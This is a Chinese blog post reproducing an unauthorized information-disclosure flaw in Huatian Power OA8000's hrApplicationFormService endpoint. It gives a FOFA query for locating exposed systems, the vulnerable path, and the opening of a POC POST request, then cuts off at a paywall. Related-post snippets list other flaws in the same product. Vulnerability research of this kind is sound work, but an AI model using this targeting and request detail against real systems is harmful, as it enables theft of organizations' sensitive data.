华天动力-OA-hrapplicationformservice-信息泄露(含批量验证poc)

已于 2024-04-17 16:08:29 修改
阅读量188 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-17 16:08:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137877173
版权
华天动力OA协同软件存在一个安全漏洞,具体为hrApplicationFormService接口权限配置错误,允许通过特定请求获取敏感信息。复现环境需满足fofa查询条件:app=‘华天动力-OA8000’。修复建议包括对接口增加权限认证,以防止未授权访问。
摘要由CSDN通过智能技术生成

产品简介

华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。

漏洞描述

由于华天动力OA的hrApplicationFormService接口权限设置不当,可以通过构造特殊请求的方式获取系统敏感信息。

复现环境

fofa:app=”华天动力-OA8000”

image.png

漏洞复现

http://your-ip/OAapp/bfapp/buffalo/hrApplicationFormService

POC

POST /OAapp/bfapp/buffalo/hrApplicationFormService HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
华天动力OA downloadWpsFile接口处任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
07-26 160
华天动力OA downloadWpsFile接口处存在任意 文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
csrf-poc-creator:用于CSRF概念验证的Burp Suite扩展
05-11
csrf-poc创建者用于CSRF概念验证的Burp Suite扩展作者:@rammarj 您可以下载所有源代码并自己进行编译,也可以下载jar文件并开始使用burp csrf-poc-creator
漏洞复现】华天动力-OA-hrapplicationformservice-信息泄露
知黑而守白
01-11 417
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。华天动力OA系统中的hrApplicationFormService接口存在一个任意文件读取漏洞,攻击者可以通过构造恶意请求,利用该漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。攻击者可能通过利用此漏洞获取敏感信息,导致潜在的信息泄漏风险。
华天动力OA办公系统存在未授权访问漏洞(新)-漏洞挖掘
weixin_43167326的博客
01-20 897
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。华天动力OA存在未授权访问漏洞,攻击者可以读取用户信息,读取敏感信息等,利用。请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
华天OA漏洞复现手册
1stPeak's Blog
04-21 5491
前言:万户OA产品漏洞复现笔记,供自己使用,不定期更新 声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。 漏洞列表: 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞 万户OA download_ftp.jsp 任意文件下载漏洞 漏洞描述 万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 漏洞影响 万户OA 网络测绘 app="万户网络-ezOFFICE" 漏洞复现 ...
漏洞复现】华天动力OA TemplateService接口处存在任意文件读取漏洞
https://blog.echo234.cn/
03-30 653
华天软件有限公司(简称“华天动力”)是国内首批专注于独立OA协同软件研发、为政企提供垂直专业、数智化转型解决方案的科技创新型企业。华天动力OA TemplateService 接口处存在任意文件读取漏洞,攻击者可以利用此漏洞获取系统敏感信息
华天动力-OA8000 MyHttpServlet 文件上传漏洞复现
0xSec
11-29 1661
华天动力OAMyHttpServlet存在任意文件上传漏洞,未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句,获取用户账号密码等敏感信息
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的...
cve-2018-2893-poc
05-07
描述中提到的"poc"是Proof-of-Concept的缩写,它是一个概念验证的代码或程序,证明了漏洞的存在。Python脚本`cve-2018-2893-poc.py`就是这样一个PoC,用于检测目标系统是否受此漏洞影响。用户可以运行此脚本,并提供...
poc-route-autoload
04-29
标题“poc-route-autoload”涉及的是一个关于路由自动加载的Proof of Concept(概念验证)项目,主要在Node.js环境中实现。在这个项目中,我们关注的是如何高效地管理和动态加载应用中的路由,以便于构建RESTful API...
华天OA任意文件上传漏洞 复现
薛定谔嘚喵博客
10-09 690
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。该OA系统存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器的敏感信息
【复现】华天动力OA办公系统 任意文件读取漏洞_62
fushuang333的博客
03-02 1238
【复现】华天动力OA办公系统 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容。
漏洞复现】天OA存在任意文件上传漏洞
失心少年
09-08 909
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。第二步这里,我试了几次没有写成功,可能是post请求body部分哪里没有搞对,有兴趣的可以试一试,成功了告诉我。
华天动力OA ntkodownload.jsp 任意文件读取漏洞批量验证poc
最新发布
weixin_43567873的博客
04-07 174
华天动力OA ntkodownload.jsp 任意文件读取漏洞批量验证poc
华天动力OA TemplateService 任意文件读取漏洞复现
0xSec
12-28 1509
华天动力OA TemplateService接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
华天动力OA workFlowService SQL注入获得root权限
失心少年
08-04 724
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!发现mysql为root权限,剩下的就简单了,查目录写文件。fofa:app=“华天动力-OA8000”到这里,oa的路径也就得到了,剩下的自由发挥。该命令可查询到mysql按照路径,2、sqlmap梭哈。
华天动力oa-TemplateService-任意文件读取漏洞-未公开day漏洞复现
weixin_43167326的博客
01-20 435
华天动力OA系统中的TemplateService接口存在一个任意文件读取漏洞,攻击者可以通过构造恶意请求,利用该漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。攻击者可能通过利用此漏洞获取敏感信息,导致潜在的信息泄漏风险。。
poc-yaml-thinkphp5023-method-rce poc1
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值